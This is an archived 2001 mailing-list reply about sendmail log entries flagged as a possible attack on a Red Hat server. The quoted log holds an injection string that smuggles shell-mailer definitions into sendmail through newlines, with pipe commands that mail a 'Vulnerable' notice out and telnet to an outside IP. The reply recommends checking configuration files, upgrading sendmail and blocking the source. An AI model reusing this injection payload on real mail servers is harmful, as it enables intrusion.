[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?

Subject: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
From: SM <nntp@xxxxxxxxx>
Date: Sat Dec 22 16:32:03 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

Hi Edward,
At 21:21 22-12-2001 -0000, Edward Bishop wrote:
>I've got four entries in my maillog which I've never seen before and which
>look terrifying. This is on my non-Cobalt server (RedHat) so I don't know if
>it's of relevance to this list. If not, apologies - but I'd be grateful for
>suggestions as to good lists to try, hopefully with people as helpful as on
>this one.
>
>Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from
>ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
>P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c
>$u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ;
>echo quit ) |telnet 203.87.15.193 5701"

This looks suspicious.  Verify your sendmail.cf and .forward file to see
whether they contain any of these entries?  I assume that you are using
Sendmail 8.11.x.  Versions of Sendmail below 8.11.6 were vulnerable to a
local root vulnerability.  This vulnerability does not apply to version
8.9.3 btw.

I'll ask some Sendmail people about the above.  Meanwhile, you may wish to
verify that box and block access from netconnect.net.au and to 203.87.15.193.

Regards,
-sm

References:
- [cobalt-users] Maybe OT: maillog reports attack; other lists?
  - From: Edward Bishop

Prev by Date: Re: [cobalt-users] cobalt sendmail MaxReciepientsPerMessage
Next by Date: Re: [cobalt-users] Setting a Seconday DNS Server - Help Please
Previous by thread: [cobalt-users] Slightly OT - RAQ2 / Brosoft
Next by thread: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index